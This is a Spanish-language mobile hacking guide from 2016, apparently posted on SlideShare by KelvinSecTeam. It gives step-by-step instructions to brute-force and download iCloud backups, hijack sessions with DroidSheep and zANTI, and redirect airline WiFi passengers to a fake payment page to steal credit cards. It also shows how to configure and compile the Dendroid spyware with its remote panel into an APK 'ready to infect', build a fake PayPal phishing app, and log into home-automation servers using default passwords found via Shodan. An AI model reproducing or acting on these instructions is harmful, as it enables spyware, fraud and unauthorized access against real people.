SlideShare una empresa de Scribd logo
1 de 71
Descargar para leer sin conexión
Autor: kelvin parra
Grupo De Trabajo: KelvinSecTeam
Escrito: 25-08-2016
1 DEFINICION:
Este nuevo articulo completo de seguridad mobil consiste en visualizar los riesgos y aplicar tecnicas de
hacking mobile desde un celular donde existen distintos y multiples metodos de la seguridad del mobil
en tecnicas de explotacion, herramientas y definiciones que ayudaran a entender cada paso de los
metodos que explicaremos y en algunos casos proteccion mobil.
Black hat hacking “hacker de zombrero negro” : En el blackhat hacking en seguridad mobil se define de
“hackers” con propositos malignos con fines de investigacion y exponer la vulnerabirilidad para darle una
ventaja al pirata inforamtico utilizar la tecnica o vender esta tecnica llamadas “0day” en el sitios
DarkNets por un cambio de bitcoin.
Research Security “Investigador De Seguridad” : En este caso solo se basaria en indentificar el erorr y en
algunos casos explotar la vulnerabirilidad con fines de reportar la vulnerabirilidad y llevarla a algun
soporte tecnico de la empresa para que arregle el problema presentado por el investigador de seguridad.
Area De Trabajo:
Redes: C onsiste en el estudio o del uso automatizado de herramientas para testear redes WPA o WPA2.
Aplicación Web Security: Este es el que lleva el cargo de testear y buscar vulnerabirilidades web.
2 SEGURIDAD IPHONE:
Ante la variacion entre el uso de iphone o android la mas afectada es android aunque queremos
incorporar la seguridad iphone para dar una detallada explicacion sobre de lo que se trata “Seguridad
mobil” y se efectua en cualquier sistema operativo.
Rasgos De Seguridad:
1) Red De Comunicación
2) Reverse Engginer
3) Privacidad
4) Esquemas De direcciones
5) Notificaciones De Inserccion
6) Almacenamiento De Datos De La Aplicación
Los hackers son aquellos que buscan investigar estos rasgos ahora lo compartimos y
comerciamos a usuarios que quieren aprender y pueda ser una ayuda o una guia para la
motivacion a otro usuarios seguir investigando y buscar nuevos metodos.
3 JAILBREAK EN IPHONE
Definicion:
Jailbreak nunca fue permitido por las empresas pues personas han creido que el Jailbreak es
un metodo que fue aceptado vor las empresas para permitir la ejecucion de cualquiera
aplicación en el dispotivo de ubicación externa es decir como por ejemplo la descarga de
malware en portales webs y hacer estas “Supuestas” aplicacioens ejecutables.
Herramienta Automatizada:
Todo surgio en un exploit y conjunto de terminales el duscubrimiento de un fallo de seguridad
que permitia hacer una funcion que no permitia tanto Iphone Y Android pero ahora con el
estudio de la logica del rompimiento de la seguridad y la ayuda de programadores con
pensamiento hacking han desarrollado variedades de herramientas para realizar el jailbreak
automatizado desde un software que puede correr en distintos sistemas operativos de tu
ordenador.
Herramientas a utilizar durante jailbreak Iphone:
1) Pwnage Tool 2) JailBreakMe 3) Greenpois0n
4 EMPEZAR JAILBREAK CON PWNAGE TOOL
Categoria De herramientas automatizadas para jailbreak:
Pwnage Pwnage: En conjunto para hacer jailbreak al iPhone, iPod touch , y el iPhone 3G.
ARM7 Go (de iOS 2.1.1) : por jailbreak tethered en el iPod touch 2G.
Limera1n Exploit :T ethered jailbreak para el iPhone 3GS, iPod touch 3G, iPad, iPhone 4, iPod
touch 4G y Apple TV 2G.
usb_control_msg Exploit : también conocido como "steaks4uce para jailbreak tethered en el
iPod touch 2G.
Recomendación de pagina: https://www.theiphonewiki.com/wiki/Jailbreak_Exploits
Gracias a Theiphonewiki por dar soporte a los exploits de cada version en Iphone y vamos ahora
a utilizar estas herramientas y definirlas:
Versiones que permite realizar Jailbreak PwNAGE TOOLS:
Pwnage Tool:
Es una herramienta de jailbreak iOS para Mac OS X que fugas de por crear un IPSW. Se le
permite cambiar logos de arranque y añadir paquetes pre-instalado para el IPSW. Una vez
creado un IPSW que se puede utilizar para restaurar a través de iTunes.
Disponibilidad: Windows Y MAC
Pwnage: http://blog.iphone-dev.org/post/1359246784/20102010-event
Firmware: http://www.felixbruns.de/iPod/firmware/
Una vez descargado tanto el Pwnage Y Firmware ejecutamos el “Pwnage” y nos aparecera
como a continuacion:
Ahora debes clicekar en un modelo:
Seleccionamos:
Ahora nos saldra un opcion de busqueda de la IPSW para los que no saben que es un fichero
IPSW es u fichero que sirve para restaurar Tu iPhone o Ipad, Ipod.
Seleccionamos el IPSW:
Ahora nos saldra un menu
Ahora vamos a Cydia Packages y una vez dentro de esa opcion del menu presionamos en
“Refresh”
Ahora seleccionamos 1 del listado “Open SSH” y presionamos en en la flechita “Azul” que se
encuentra en la parte inferior derecha.
Selecciona en build y presionamos en la flechita azul de nuevo.
Ahora presionamos en “SAVE” y comenzara a aplicar la accion de construccion del firmware.
Ahora por ultiimo nos dara un mensaje donde dice “Conecto El Dispositivo” y Active En Modo
DFU.
Conectamos el dispositivo y activamos el modo DFU.
Y Jailbreak Completo.
Informacion: Este es el metodo automatizado del jailbreak en un dispositivo Ipod , Iphone,
Ipad.
Promesas De Jailbreak ante Iphone:
1) Jailbreak – Permite instalar cualquiera otra aplicación externa.
2) Jailbreak – tiene como significado saltar la seguridad del dispositivo y obtener privilegios.
5 IPHONE BACKUP & ICLOUD:
Un dia publicamos en kelvinsecurity el metodo automatizado de usar y obtener por medio de
una herramienta ejecutada en el lenguaje de programacion python que aplica la siguiente
funcioens:
1) Permite lanzar ataques de fuerza bruta a cuentas de Apple
2) Permite obtener la backup de una cuenta de Icloud.
Direccion de descarga: https://github.com/hackappcom/iloot
1) Herramineta iloot permitiria extraer la backup de una cuenta de Apple
Requisitos:
Sistema operativo: Linux o windows
Python 2x
Instalacion:
pip install -r requirements.txt
ejecucion inicial y lista de comandos:
python iloot.py -h
usage: iloot [-h] [--threads THREADS] [--output OUTPUT] [--combined]
[--snapshot SNAPSHOT] [--itunes-style]
[--item-types ITEM_TYPES [ITEM_TYPES ...]] [--domain DOMAIN]
[--keep-existing]
apple_id password
Necesitas el (Usuario – Contraseña de la cuenta Apple)
apple_id Apple ID
password Password
Ejecucion en la terminal: iloot.py email password
 Transcurso de la sesion -
Ahora nos da el siguiente mensaje:
“Quiere usted descargar el libro de direcciones, mensajes y fotos”
Si => (Yes)
Y asi de automatizado funciona la herramienta.
Ficheros Y Su Contenido:
AddressBook.sqlitedb información de contacto y datos personales
como nombre, dirección de correo
electrónico,
cumpleaños, organización, etc ...
AddressBookImages.sqlitedb imágenes asociadas con los contactos
guardados
Call_history.db entrante y registros de llamadas salientes,
incluyendo números de teléfono y
marcas de tiempo Mensajes de texto y
multimedia
com.apple.accountsettings.plist datos sobre todas las cuentas de correo
electrónico que se configuran en el
Aplicación de correo electrónico de Apple
com.apple.network.identification.plist datos de la red inalámbrica, incluyendo la
dirección IP, la dirección IP del router,
SSID y marcas de tiempo
consolidated.db Tiendas GPS los datos de seguimiento
Voicemail.db Mensajeria De Voz
Existe otra herramienta y es la de fuerza bruta por que muchas vecess hemos notado distintos
tipos de seguridad pero no hemos visto uno que “Salte la autentificacion” y entre de
inmediatamente a los correos de apple en ese caso existen 2 funciones que podemos usar para
lanzar el ataque.
1) Por fuerza bruta: la fuerza bruta se podra utilizar desde una herramineta automatizada
en lenguaje python o desde un portal web desarrollada en PHP y con el uso de un
diccionario de contraseñas normalmente se utilizar el ataque de fuerza bruta por que
“Apple” no bloquea los intentos de acceso en caso a una direccion IP.
2) Preguntas De Seguridad: Hemos notado preguntas de seguridad debiles para los
amantes del doxing se les ara facil y es que las preguntas de seguridad suelen ser algo
sencillas en cuanto las preguntas mas facilitadas como “En que ciudad nacio tu madre” o
“el nombre de tu perro” ect.
6 APLICACIONES PENTESTING
Existe una gran variedad de herramientas de pentesting que puedes ejecutarla en tu android
son aplicaciones que necesitan que tu telefono se encuentre roteado para tener los permisos
necesarios para empezar a realizar las funciones como las siguientes:
1) Scanneo y identificacion de dispositivos en una red
2) Scanneo y visualizacion del trafico en la Red Wifi
3) Realizar Ataques MITM
4) Scanner de puerto
5) Conexión a puertos y identificar
6) Sacar informacion de un host
7) Ataques DoS
8) Auditacion de password y aplicación de direccionarios para fuerza bruta
9) Establecer conexiones remotas
Puerto Scanner: Se encargar lanzar un mapeo de los puertos entre ellos lo mas conocidos
dentro de una IP local o de un servidor entre los puertos se encuentran los mas conocidos y son
los puertos 8080 :80 .5900 .21 .23.
Ataque MITM: El Man-in-the-middle que consiste en que el atacante se interpone entre el
cliente y el servidor. Con este ataque demostraremos como se pueden obtener credenciales en
una conexión segura.
Ahora vamos a sniffear la red con una aplicación llamada droidsheep es utilizada en android:
Direccion De Descarga: http://droidsheep.downloadxapp.com/
7 ROBAR SESIONES CON DROIDSHEEP
Bueno antes que todo hay que estar conectado a una red wifi y empezar a scannear desde la
aplicación android DROIDSHEEP existen un nivel entre DROIDSHEEP y ZANTI y es que ZANTI se
encuentra mejor personalizada y con mas opciones.
Secuestro De Sesion:
Sólo hay un cliente dentro de la red inalámbrica que se es el único que envía y recibe paquetes
Una petición HTTP envía será recibido por el punto de acceso inalámbrico y, usando
enrutamiento TCP / IP, el paquete será enviado al servidor web. Si la red inalámbrica está
activada la seguridad (por ejemplo, usando WPA-2 y una clave fuerte), un atacante no es capaz
de leer cualquier paquete HTTP y por lo tanto no puede robar identifica la sesión del usuario.
con sólo escuchara la red.
Capturando Sesiones:
La herramienta tiene 2 opciones y es el sistema esta automatizado para indetificar aquellas
paginas sobre “HTTP” se encuentra con 2 opciones solamente “START” y “STOP”.
Aca hay un problema y es que los ataques MITM “Mitiga” cuando facebook establece su cifrado
seguro de sesiones y implementa el “Https” dejando a ataques como MITM sin poder realizar la
captura de sesiones por lo tanto este solo debie empezar a capturar sesiones sobres los
problemas de certificados SSL y durante la web se encuentre en http.
Para abrir una sesion solamente debemos es clickear sobre una y saldran 3 opciones y vamos la
opcion de abrir pagina normal.
Una vez ya deberiamos estar observando dentro de la aplicación la sesion:
DroidSheep utiliza su programa nativo para capturar paquetes. Esta programa nativo utiliza
libpcap, una biblioteca de acceso a la red proporcionada por el núcleo y por defecto incluido en
cualquier distribución androide. DroidSheep utiliza estas funciones proporcionadas por libpcap:
Nombre De Funcion: Descripcion:
pcap_lookupdev función de búsqueda para la interfaz de red
por defecto en el dispositivo.
pcap_lookupnet d eterminar la dirección de red y la máscara
de subred del dispositivo
pcap_open_live escuchar paquetes recibidos por el
dispositivo
pcap_compile Compila una expresion de un filtro
pcap_loop Inicia un bucle sin fin escucha de paquetes y
llamadas método de devolución de llamada
para cada paquete capturado
pcap_freecode Desasigna la memoria para el compilado
pcap_close Cierra de captura de la sesion
8 COMO UTILIZAR - ZANTI
Zanti: Es una herramienta que pocos utilizan y los expertos de seguridad informática la
utilizan a menudo en sus celulares con tecnología “Android” para detectar todo tipo de
redes y robar contraseñas además de desafiar al servidor escaneando puertos y
reconociendo dispositivos como “Impresoras” , “Celulares blackberry” , “Android” ,
“WindowPhone” , “Routers” y cualquier otra tecnología conectada a una red y con sus
puertos abiertos facilitando al pirata realizar acciones que puedan perjudicar al usuario
conectado a una misma red.
Descargar Aplicacion:
Zanti: tiene 2 opciones la premium y la free , obviamente para el usuario como tal
pueden descargar la free por medio del vinculo:
https://www.zimperium.com/zanti-mobile-penetration-testing donde deberán llenar datos
como su dirección de correo electrónico y clickear en “Dowload”.
Root En Android:
El celular debe estar rooteado para darle los permisos necesarios que necesita la
aplicación para utilizar nuestro celulares y empezar a auditar todo tipo de redes
además de vulnerar otros dispositivos.
DESPUES DEL ROOT:
Ahora podemos utilizar “ZANTI” abrimos la aplicación “recuerda que debemos estar en
una red WIFI, conectado”
Una vez instalado zanti y ejecutado además de conectarnos a una red “WIFI” donde
muchas personas estén conectadas en este momento sean ordenadores o celulares,
nos muestra una lista de direcciones IPS asignadas además de su dirección “MAC” ,
además podemos visualizar los “Logos” o “Icons” de cada dispositivo donde
encontramos laptops y celulares conectados a continuacion..
VISUALIZANDO UNA VICTIMA:
•Clickeamos en nuestra primera victima y se trata de un “Modem” en que estamos
conectados por la dirección por defecto de configuración podría ser la “192.168.0.1 o
192.168.1.1” pero el problema general serian los puertos podemos realizar una fuerza
bruta para buscar los puertos en caso que el puerto “80” que nos permite visualizar por
medio de una plataforma web este desactivado posiblemente tenga el puerto “443” que
también nos permitiría visualizarlo entonces la herramienta nos ayudaría a buscar esos
puertos, en la opcion “Password Complexity Audit”.
BUSCAR EL PUERTO PERFECTO:
Dejamos el “Automatic Mode” en “ON” y dejamos el cracking method en
“Small Dictionary” y luego presionamos en “GO”.
VER LOS PUERTOS Y CONTRASEÑAS POR DEFECTO:
Ahora que nos muestra los puertos sabemos 3 tipos de conexiones seguras pero
posiblemente “Protegidas por una contraseña por defecto o modificada”, ahora por
medio del puerto “21” significa manipulación de logs o ficheros del modem, por el
puerto 23 conexión al menu y configuración del modem, y por medio del puerto 80 y
443 podría ser que el modem este protegido o quizás no, la herramienta también tiene
una capacidad de realizar un ataque de fuerza bruta para descifrar la contraseña por
defecto.
ACCEDIENDO POR DEFECTO:
Las contraseñas por defecto de un modem podrían ser una vez conectado a la red
puerto 80 podría lanzarnos 2 tipos de autentificación 1) Www-authenticate 2) formulario
de “Usuario y Contraseña” simple.
Contraseñas por defecto: admin:password admin:Sin_Contraseña admin:admin
user:12345 admin:123456 admin:123 administrador:123456
TIPO DE AUTENTIFICACION:
“2002 OK” > se carga sin ninguna autenticación.
“401 Unauthorized”> pancartas con WWW Authenticate indicar un nombre de usuario y
contraseña
La autenticación es posible, pero aún no se logra, a diferencia de "403 Forbidden”
,Algunas
banners anuncian por defecto.
AVISO DE CONTRASEÑAS AL PUBLICO MEDIANTE UN HTTP TRACER:
•Este caso se ve mucho y es que cuando nos conectamos a una dirección IP de un modem
o producto o router nos lanza la contraseña por defecto sin tener que estar aplicando la
fuerza bruta con “ZANTI”, password:1234 y como usuario ninguno.
ATAQUE MITM:
Es un ataque en el que se adquiere la capacidad de leer, insertar y modificar a
voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace
entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar
mensajes entre las dos víctimas.
Ataque Man-in-the-middle Con Zanti
Zanti tiene una opción de ataque main in the middle que permite que tu veas las
sesiones que tiene tu victima en facebook, twitter o yahho amazon ect.
9 COMO UN HACKER PUEDE VINCULAR PHISHING CON ZANTI
EL TEMA DE QUE HABLAMOS ES LA PROVEEDORA DE INTERNET "GoGo -
WIFI" UNA EMPRESA YA INSTALADA EN DIFERENTES AEREOLINEAS YA
HABLAMOS ANTERIORMENTE EN OTRO DE MIS BLOGS DE "KELVINSECTEAM"
EN QUE EXPLICA VAMOS QUE TAMBIÉN PUEDE SER UTILIZADO
PARA FINES TERRORISTAS INVOLUCRANDO A OTROS CIUDADANOS
CONECTADOS A UNA MISMA RED. TAMBIÉN HE VISTO OTRO VIDEO LLAMADO
"WIFI-GOGO HACK" DONDE UNA PERSONA SEGÚN EL O ELLA HA DESCUBIERTO
UNA MENERA DE BYPASSEAR "SALTEARSE" LA PETICIÓN DE CREDENCIALES O
MAS BIEN EL "PAGO EN LINEA DESDE LA WEB GOGO".
Mapa De técnica:
1 - (abrir zanti) =>
2 - (Opcion De Redireccion) =>
3- (ingresar ejemplo: www.tuphishinpayment.com)
4- (cualquier usuario conectado a la red wifi será redireccionado al phishing al abrir su
navegador en su mobil o Tablet)
MUY BIEN UNA VEZ MONTADOS EN EL AVION VAMOS A BUSCA UNA RED "WIFI"
NOS ENCONTRAMOS CON LA DE GOGO SE ENCUENTRA LIBERADA PERO TIENE
RESTRICCION DE NAVEGACION UNA DE LAS COSAS QUE QUIERO DECIR ES
QUE NO HE TENIDO LA OPORTUNIDAD PARA YO "AUDITAR" EN VIVO Y EN
PERSONA A "GoGo" EN UNA AEREOLINEA COMO ES AMERICAN AIRLINE.
BIEN EL PROBLEMA DE SEGURIDAD PODRÍA SER EL SIGUIENTE:
1) AL PESAR QUE NO TENEMOS FORMA ALGUNA DE NAVEGAR NOS
ENCONTRAMOS CONECTADOS.
2) PODEMOS USAR UN ATAQUE "MAIN IN THE MIDDLE" Y ROBAR
CREDENCIALES DE PERSONAS QUE VIAJAN ATRAVES DEL MISMO AVION.
3) POSIBLEMENTE EXISTEN UN MÉTODO DE CREAR UN "FALSO PAYMENT" UN
FALSO SISTEMA DE PAGO CREAR UN SCAM DESDE NUESTRO ORDENADO
LUEGO SUBIRLO A UN SERVIDO Y UTILIZAR UNA HERRAMIENTA AUTOMATIZADA
COMO "ZANTI" PARA REDIRIGIR TODO USUARIO EN EL AVION CONECTADOS A
LA RED WIFI A UN FALSO VINCULO DE PAGO DE LA AEREOLINEA Y GOGO.
--- EL CATALOGO DE PAGO POR SERVICIO --
ESA ES LA RESTRICCIÓN DE NAVEGACIÓN A OTRAS DIRECCIONES URL.
PROBLEMAS
1) NO PUEDES NAVEGAR POR OTRAS DIRECCIONES PERO SI TE POPORCIONA
INTERNET
2) TE EMITE MÉTODOS DE PAGO PARA VER PELÍCULAS EN LINEA
VENTAJA:
PUEDES REALIZAR EL ATAQUE MITM SIN POBLEMAS UNO DE LOS PROBLEMAS
DE GOGO SU PAGINA NO TIENE HTTPS ES DECIR NO SE PROTEGE POR UN
CANAL SEGURO CIFRADO POR LO TANTO EL HTTP TE HACE MAS VULNERABLE
A CUALQUIER VULNERABILIDAD.
UNA DE LAS DESVENTAJAS ES QUE LA MAYORIA DE LA PAGINA YA ESTAN
UTILIZAN EL "HTTPS" Y POR LO TANTO NO SUELE SER TAN CASUAL LANZAR UN
ATAQUE MITM EN QUE TE GESTIONE CREDENCIALES EMAIL - PASSWORD DE
UNA PAGINA SOCIAL COMO FACEBOOK O TWITTER O GMAIL.
OFREZCO LA HERRAMIENTA "ZANTI" PARA ANDROID DONDE PUEDES
REALIZAR UN ATAQUE MITM ADEMAS DE OTRAS OPCIONES.
SI TE LO BAJAS EN TU TABLET PUEDES ACTIVAR EL MITM EN ESTA OPCION DE
ESTA HERRAMIENTA ROBA CREDENCIALES DE CIERTAS PAGINAS DE
CUALQUIER TIPO DE DISPOSITIVO CONECTADO A LA RED:
- FACEBOOK - TWITTER - AMAZON - GMAIL - INSTAGRAM ECT..
MAS ABAJO TENEMOS EL REDIRECT HTTP ES EL QUE NOS CONVENZE MAS YA
QUE RECUERDA QUE LA PAGINA PRINCIPAL: http://www.gogoair.com SE
ENCUENTRA HTTP Y ESO NOS HACE LA FACILIDAD DE CREAR UN SCAM LUEGO
SUBIR A UN SERVIDOR Y LUEGO UTILIZAR LA HERRAMIENTA DE ABAJO
LLAMADA REDIRECCT HTTP Y INCLUIR NUESTRA DIRECCION DE SCAM Y
LLEVANDO A NUESTRAS VICTIMAS A UN VINCULO FALSOS PARA CAPTURAR
LAS CREDENCIALES DE TARJETAS DE CREDITO.
10VIRUS Y TROYANOS ANDROID
En realidad la mayoria son troyanos y cumplen algunos la funcion de infectar tu sistema
operativo android de tu celular o tablet con la finalidad de espiar y capturar contraseñas que
son enviadas a un servidor y este servidor a un cliente el cual es el atacante.
Android Malware:
DROIDDREAM
Catacteristicas:
1) utiliza root exploits
2) varia entre mas de 50 apps en la
tienda
3) instala aplicaciones segundarias
Spitmo - zeus
Caracteristicas:
1) Funcion Virus bancario
Obad - Troyano
Caracteristicas:
1) Utiliza 3 exploits
2) Una backdoor
3) Envia Mensajes Troyanizados
Dendroid -- Troyano
Caracteristicas:
1) Infecta A dispositvos por medio de 1
aplicación generada
2) Puede ser manupulado por medio de
un servidor con plataforma
administrativa.
3) Graba Audio y Video del dispositivo.
Funciones De Troyanos:
1) GPS
2) Grabaciones de audios
3) Mensajeria y Trafico de correo electronico
4) Visualizacion de fotografias
5) Registro de llamadas
Pero no existen solo troyanos con fines malignos o comerciales en sentido del blackhat
hacking tambien existen otros que en sus portales webs han publicado que estas
aplicaciones serian una ayud para para proteger a sus hijos y monitorear empleados.
Y que nos ofrece:
En el panel administrtivo para aclarar las funciones:
11COMIENZOS CON DENDROID
Introduccion:
DENDROID es una herramineta que funciona con fines de espionaje que se utiliza para
infectar a dispositivos android este suele tener una guia de instalacion ademas tambien se
encunetra libre el codigo para ser modificado e instalado.
Funciones que cumple DENDROID:
1) Almacena el historial de llamadas del dispositvo infectado
2) Envia mensajes y borra mensajes de la victima
3) Visible la lista de contactos del mobil infectado
4) Graba Audios Y Video
5) Tiene la capacidad de enviar mensajes a todos los contactos
6) Tiene un modo de interceptacion
7) Visualiza los mensajes que llegan y se envian
Requisitos:
1) Disponer de un servidor preferiblemente acceso al Cpanel donde podras interactuar con
el “phpmyadmin” “mysql” y Almacenar los ficheros de DENDROID en php.
2) JAVA SDK para la modificacion del codigo java de DENDROID
Instrucciones de descarga:
1) Vamos al sitio de github donde se encuentra totalmente liberada:
https://github.com/nyx0/Dendroid y donde clone or dowload presionamos y clickeamos en
DOWLOAD ZIP.
Ahora visualizaremos lo que hemos descomprimido del ZIP:
En total son 3 carpetas y la que instalaremos en nuestro servidor web es Dendroid Panel alli se
encuentra los scripts PHP.
Ahora como podras observar entramos a la carpeta y ahora te dire cual carpeta esta los script
PHp y estna en “PANEL” y en “Other Files” se encuentra el fichero .sql que importaremos en
PHPMYADMIN.
Bien ahora vamos a ver lo que la carpeta panel nos tiene
Y vamos a editar las siguientes estas las agregaremos los datos de la base de datos que vamos
ha crear y modificar las direcciones URLs.
applysettings.php
blockbot.php
clearawaiting.php
clearmessages.php
deletebot.php
deletefile.php
deletepics.php
functions.php
table.php
bien ahora aparecera esta direccion en algunos ficheros:
Si tenemos el dominio “pizzachip.com” que es un ejemplo que viene por defecto en los ficheros
tendiramos que cambiarlo por la direccion de nuestro servidor exactamente donde hemos
subidos los ficheros.
Podificamos el $url = www.pizzachip.com”; por $url =”www.tuweb.com”; bien agregas la
direccion web donde has sibido los ficheros.
Ahora vamos a modificar en otro lugar de algun fichero en PHP el keylimepie eso dira en los
ficheros siguientes:
get.php
get-functions.php
new-upload.php
upload-pictures.php
lo cual cuando diga “keylimepie” a “password”.
 Saldra esa misma forma “keylimepie” lo cual modificaremos por “password”.
Esto fue algo de lo que modificamos pero aun asi falta crear una base de datos y en esa base de
datos un usuario para ingresarlo en en los codigos en “PHP” que tenemos para luego de esa
forma establecer una conexión MySQL entre la base de datos y los PHP scripts que hemos
ingresados.
1) Ahora vamos a Cpanel
2) Luego iremos a craer una base de datos y nos aparecera algo asi todo depende del tipo
de estilo o version de cpanel:
- Antes que todo crear la base de datos primera mente y luego crear el usuario para la
base de datos-
- Ahora creamos un usuario para la base de datos-
Una vez de haber creado el usuario le asignaremos los privillegios:
Bien ahora el siguiente proceso es ir al “PHPMYADMIN” e importar la base de datos .SQL que se
encuentra en la carpeta de “OTHER Files”
Iremos a phpmyadmin escogemos una base de datos que hemos creado y seleccionamos ahora
arriba en la parte superior derecha => nos dice IMPORTAR Clickeamos Alli y seleccionamos
donde se encuentra el fichero y subimos el fichero luego se creara las tablas como la imagen
que observamos en la imagen de arriba.
Ahora cuidado! Por que creamos la base de datos y usuaro pero no hemos asignado a cada una
de ellas a el script PHP te aconsejo revisar cada PHP y ver si dispone de lo siguiente:
Como en el fichero config.php
$dbhost='Aca Pondras El Servidor MYSQL';
$dbname='El nombre de la base de datos';
$dbuser='El usuario Asignado durante la creacion de la base de datos';
$dbpass='La contraseña tambien asignada durante la creacion de la base de datos';
bien revisamos cada fichero haber si encontramos los datos que presentamos y que es
importante tener en cuenta estos datos para la conexión entre el script y la base de datos.
Por ultimo deberas subir los ficheros en tu servidor ejemplo que el servidor que estes
trabajando sea:
www.android.com subiremos los ficheros en ese enlace utilizando el cliente de zimbra y una vez
que lo subas ya estaria listo para entrar al “SETUP” en el cual asignaremos un usuario y
contraseña:
Ahora no que mas que decir que darle en begin setup
Agregamos los valores de 10 en la parte <= izquierda en la derecha agregamos como esta en la
imagen agregamos un usuario y contraseña y presionamos en el boton verda de la parte inferior
derecha.
Una vez ya habra sido completado el proceso.
Luego finalizamos y entramos de nuevo en la parte principal y agregamos las credenciales de
login:
“usuario y contraseña como hemos escogido”
Luego listo podemos entrar al panel administrativos de adminsitracion de troyanos.
Configuracion del software:
Bueno ahora para la configuracion en esta parte deberemos tener ECLIPSE y tambien SDK
android.
Abrimos eclipse:
 File
 Import
ahora debemos especificar la carpeta de projecto que tenemos llamado Dendroid APK.
Ahora especificamos que ya es un projecto existente.
Hubicamos la carpeta y clickeamos en aceptar.
De igual manera aca finalizando.
Bueno ya una vez abierto el projecto en la parte <= izquierda observaremos los ficheros que
podemos modificar:
Bien de igualmanera podemos modificar los scripts a continuacion borraremos variables las
variables se encuentra en DroidianService.java, dentro del paquete com.connect y en la carpeta
src.
Llamados: encodedURL, backupURL y encodedPassword
El valor de las variables lo borramos y lo dejamos como la imagen a continuacion:
Tambien observaremos lo siguiente y son encodedURL, backupURL y encodedPassword que se
encuentran en bse64.
Luego entramos a la pagin http://crypo.in.ua/tools/eng_base64c.php que es una herramienta
para cifrar y decrifrar ahora nos tocara cifrar la direccion de nuestra pagina web donde subimos
los ficheros e instalamos.
Ahora presionamos en Encrypt:
Ese String, es que tendremos que poner como valor a las variables encodedURL y backupURL.
Para la variable encodedPassword repetiremos el mismo paso, pero esta vez deberemos de
cifrar la contraseña que pusimos a la hora de crear nuestro panel de control (aquella que
cambiamos el valor de keylimepie luego nos quedra como en la imagen de arriba.
Ahora presionamos en file y “Export”.
Ahora indicamos que quermeos la aplicación APK
A continuacion damos en siguiente luego nos saldra lo siguiente:
- Si ya tienes una contraseña presiona en “Create new keystore” luego en siguiente.
Llenamos el formulario
Para culminar seleccionamos una carpeta donde queremos guardar la APK:
Y listo tendremos nuestra APK lista para infectar a dispositivos:
12APP INVENTOR CREANDO FAKE APP
App inventor es un projecto de la universidad MIT para que sus estudiantes aprendan de crear
aplicaciones de forma sencilla y lo mejor de ello es que te permite la descarga directa de la .apk.
Lo que se quiere hacer acá es impulsar el método de crear un phishing y hacerlo ejecutable desde el
dispositivo android normalmente la aplicación no mostrar la dirección “web” desde donde nos
conectamos y es una ventaja.
 App inventor => crear un “iframe” con el vinculo falso de la pagina “Phishing”
 App Inventor => utilizar un falso logo de una web bancaria o cualquier otra payment
Instrucción:
1) Vamos a app inventor 2 > http://ai2.appinventor.mit.edu/
Creamos un projecto
Una vez ya podremos editar y agregar lo que tendrá nuestra aplicación:
En la parte inferior => derecha encontraremos con
Title: donde agregare ejemplo “paypal” que es el titulado donde dice screen 2 en la imagen que
observas arriba.
Ahora arrastraremos en la parte <= izquierda en el menu al llamado “WebViever” este lo
arrastramos hasta la pantalla
En la parte derecha superior colocamos estos 2 en full parent y mas abajo en “HomeUrl”
colocamos la direccion de nuestro phishing de paypal.
Ahora en componentes clicekamos en screen2. Y ahora vamos a agregar el logo:
En esta parte subimos una imagen cualquiera de paypal. Una vez ya terminado todo esto
podemos compilar la aplicación falsa de paypal nuestra victima ejecutara la aplicación y de
inmediato le pedira las credenciales tal como especifica tu phishing.
Presionamos en BUILD y generamos la App en APK y listo tu APK falsa de paypal.
13COMUNICACIÓN ANDROID CON DISPOSITIVOS DOMESTICOS
Existen multiple aplicaciones que permiten tener control sobre distintos aparatos domesticos
que pueden funcionar por una comunicación Wireless y muchos de ellos tambien pueden ser
controlados por medio de un servidor con plataforma que podemos observar graficamente uno
de los productos que conosco mas es Btcino durante las primeras pruebas de kelvinsecurity
teniendo un remoto control sobre todo un hogar muchos clientes de esta empresa han
notificado que algo extraño pasa en su hogar.
Lo encontramos disponible para “Android” aunque su conexión via WIFI podria ser esta y no una
conexión con peticion de credenciales como “User: Password:” como es la de btcino
generalmente en un servidor con plataforma.
_bien vamos con los detalles del producto automatizado:
„La gestión de la iluminación , El accionamiento de persianas y/o cortinas eléctricas,
ventiladores, aspiradores, etc
_estadísticas de servidor:
HTTP/1.1 302 Found
Date: Sat, 23 Jul 2016 15:14:35 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/1.0.0d PHP/5.1.6
X-Powered-By: PHP/5.1.6
location: /iden.php
Content-Length: 0
Content-Type: text/html
Infraestructura:
POR   MEDIO   DEL   TOUCH   EL   OPERADOR   PODRÁ   REALIZAR   LAS   MISMAS
ACCIONES QUE REALIZARA UN HACKER POR MEDIO DE UN SERVIDOR.
HACKER AUDITANDO EL SISTEMA:
1) RESPECTO AL SERVIDOR   SU ENTRADA A LA PLATAFORMA DONDE NOS
PIDE LAS CREDENCIALES POR MEDIO DEL PUERTO 80 SI HACEMOS UN URL
FUZZ VEREMOS QUE NO NOS PROPORCIONARA INFORMACION CLARO NOS
LANZARA UNOS CUANTOS DIRECTORIOS "INDEX OF" DONDE ESTA VINCULADO
EL CONFIG ­ INSTALL ECT PERO NINGUN FORMATO SERA VISUALIZADO.
2)   LAS   CREDENCIALES   SUELEN   SER   MUY   SENCILLAS   TE   TRAEMOS   UN
LISTADO DE CONTRASEÑAS DEBILES Y CREEMOS QUE SON LAS MISMA QUE
SE LE AGREGAN A BTICINO EN SU VERSION ANTIGUA.
>USER:USER   >USER:123456  >ADMIN:ADMIN >ROOT­123456
DIRECTORIOS:
Directories HTTP Code HTTP Reason
/javascript/ 200 OK
/lib/ 200 OK
/styles/ 200 OK
/language/ 200 OK
/img/ 200 OK
/cgi­bin/ 403 Forbidden
­­ SISTEMA DE CONTROL ­­
shodan:  location: iden.php
PROBLEMA PRINCIPAL Y VENTAJAS DE UN PIRATA:
1) LA CONTRASEÑA DE FABRICA POR DEFECTO ES ADMIN:ADMIN ENTONCES
AUNQUE   SE   LE   AGREGUE   UNA   CONTRASEÑA   ASIGNADA   LA   ADMIN;ADMIN
SERA APROBADA COMO USUARIO CON PRIVILEGIOS.
2) CUALQUIERA QUE ENTRE A ESTE SISTEMA PODRIA TENER CONTROL DE EL
HOGAR   E   INCLUSO   LLAMADAS   DE   ESPERA   TAMBIEN   LA   ILUMINACION
PERSIANAS COMO LO HEMOS DICHO.
ESA   FUE   LA   CONTRASEÑA   Y   AUN   ASI   ENTRAMOS   CON   "ADMIN:ADMIN"
